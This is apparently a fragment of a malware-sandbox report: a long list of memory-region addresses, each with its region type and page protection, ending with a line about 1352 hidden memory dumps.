page read and write
|
||
22F90000
|
heap
|
page read and write
|
||
2ACF000
|
stack
|
page read and write
|
||
2330000
|
heap
|
page read and write
|
||
617D000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7BD000
|
stack
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
22D08000
|
heap
|
page read and write
|
||
6430000
|
direct allocation
|
page read and write
|
||
22D58000
|
heap
|
page read and write
|
||
3610000
|
trusted library allocation
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
1BFC13A0000
|
trusted library allocation
|
page read and write
|
||
1BFC1450000
|
heap
|
page read and write
|
||
89F000
|
stack
|
page read and write
|
||
22CAD000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
1BFBCB40000
|
trusted library allocation
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
17C000
|
stack
|
page read and write
|
||
21DB000
|
heap
|
page read and write
|
||
1BFBBEFF000
|
heap
|
page read and write
|
||
1BFC141F000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
6181000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
538000
|
heap
|
page read and write
|
||
8D1D000
|
heap
|
page read and write
|
||
27EF000
|
stack
|
page read and write
|
||
221C000
|
heap
|
page read and write
|
||
2215000
|
heap
|
page read and write
|
||
32E0000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
5C81000
|
trusted library allocation
|
page read and write
|
||
1BFC12A0000
|
trusted library allocation
|
page read and write
|
||
64E000
|
heap
|
page read and write
|
||
1BFC1600000
|
trusted library allocation
|
page read and write
|
||
D20000
|
heap
|
page read and write
|
||
3046000
|
heap
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
1BFBBEA8000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
21D5000
|
heap
|
page read and write
|
||
8E70000
|
trusted library allocation
|
page execute and read and write
|
||
545000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
52E000
|
stack
|
page read and write
|
||
1BFC1462000
|
heap
|
page read and write
|
||
7AC0000
|
direct allocation
|
page read and write
|
||
2DB4000
|
heap
|
page read and write
|
||
217DE000
|
stack
|
page read and write
|
||
8CE8000
|
heap
|
page read and write
|
||
177000
|
stack
|
page read and write
|
||
1BFBC470000
|
trusted library allocation
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
42A000
|
unkown
|
page read and write
|
||
1BFC166F000
|
trusted library allocation
|
page read and write
|
||
2218E000
|
stack
|
page read and write
|
||
360D000
|
trusted library allocation
|
page execute and read and write
|
||
29CF000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
3604000
|
trusted library allocation
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
347E000
|
stack
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
2289D000
|
unclassified section
|
page execute and read and write
|
||
21F1000
|
heap
|
page read and write
|
||
224E000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
32A0000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
B71000
|
heap
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
2531000
|
heap
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7C47000
|
trusted library allocation
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
B4024FE000
|
stack
|
page read and write
|
||
6182000
|
heap
|
page read and write
|
||
2DAA000
|
heap
|
page read and write
|
||
7C80000
|
heap
|
page read and write
|
||
6050000
|
direct allocation
|
page read and write
|
||
43E000
|
unkown
|
page read and write
|
||
B401CFE000
|
unkown
|
page readonly
|
||
544000
|
heap
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
1BFC14F9000
|
heap
|
page read and write
|
||
1BFBBEB3000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
346A000
|
heap
|
page read and write
|
||
2239000
|
heap
|
page read and write
|
||
1BFBC713000
|
heap
|
page read and write
|
||
1BFBCCF0000
|
trusted library section
|
page readonly
|
||
21DF000
|
heap
|
page read and write
|
||
2223000
|
heap
|
page read and write
|
||
22C36000
|
direct allocation
|
page execute and read and write
|
||
2224000
|
heap
|
page read and write
|
||
2275000
|
heap
|
page read and write
|
||
4AE000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
21F1000
|
heap
|
page read and write
|
||
60FC000
|
heap
|
page read and write
|
||
22AD0000
|
unclassified section
|
page execute and read and write
|
||
2231000
|
heap
|
page read and write
|
||
18F000
|
stack
|
page read and write
|
||
21D5000
|
heap
|
page read and write
|
||
6189000
|
heap
|
page read and write
|
||
616E000
|
heap
|
page read and write
|
||
223C000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
22B43000
|
unclassified section
|
page execute and read and write
|
||
A30000
|
heap
|
page read and write
|
||
21F6000
|
heap
|
page read and write
|
||
22CE0000
|
heap
|
page read and write
|
||
2225000
|
heap
|
page read and write
|
||
649E000
|
trusted library allocation
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
2BCF000
|
stack
|
page read and write
|
||
5E90000
|
heap
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
6E8000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
AB76000
|
direct allocation
|
page execute and read and write
|
||
2231000
|
heap
|
page read and write
|
||
2226000
|
heap
|
page read and write
|
||
5586000
|
trusted library allocation
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
B401BFE000
|
unkown
|
page readonly
|
||
4F4000
|
heap
|
page read and write
|
||
21D5000
|
heap
|
page read and write
|
||
34BF000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
2206000
|
remote allocation
|
page execute and read and write
|
||
2214C000
|
stack
|
page read and write
|
||
34BB000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21D9000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
C8E000
|
unkown
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
22D91000
|
heap
|
page read and write
|
||
6114000
|
heap
|
page read and write
|
||
221E000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
1BFBBF02000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
B5B000
|
heap
|
page read and write
|
||
1BFC1660000
|
remote allocation
|
page read and write
|
||
22CA8000
|
heap
|
page read and write
|
||
221C000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
7F1D0000
|
trusted library allocation
|
page execute and read and write
|
||
21EE000
|
heap
|
page read and write
|
||
223C000
|
heap
|
page read and write
|
||
D40000
|
heap
|
page read and write
|
||
1BFC12C0000
|
trusted library allocation
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
7AB0000
|
direct allocation
|
page read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
7B7A000
|
heap
|
page read and write
|
||
3630000
|
trusted library allocation
|
page read and write
|
||
6060000
|
direct allocation
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
2235000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
26D1000
|
heap
|
page read and write
|
||
22AAB000
|
unclassified section
|
page execute and read and write
|
||
624000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
26D1000
|
heap
|
page read and write
|
||
2FEA000
|
heap
|
page read and write
|
||
68C000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
1BFBBE72000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
2239000
|
heap
|
page read and write
|
||
6439000
|
trusted library allocation
|
page read and write
|
||
22D8E000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2235000
|
heap
|
page read and write
|
||
1BFBBE2B000
|
heap
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
21D5000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
B400EF7000
|
stack
|
page read and write
|
||
32B6000
|
heap
|
page read and write
|
||
220F000
|
heap
|
page read and write
|
||
5DD000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
21D5000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21E6000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
2233000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
6172000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
26F5000
|
heap
|
page read and write
|
||
2225000
|
heap
|
page read and write
|
||
47E000
|
stack
|
page read and write
|
||
2275000
|
heap
|
page read and write
|
||
3550000
|
heap
|
page read and write
|
||
22CE3000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
B4028FD000
|
stack
|
page read and write
|
||
224E000
|
heap
|
page read and write
|
||
2228000
|
heap
|
page read and write
|
||
B401E7E000
|
stack
|
page read and write
|
There are 1352 hidden memdumps, click here to show them.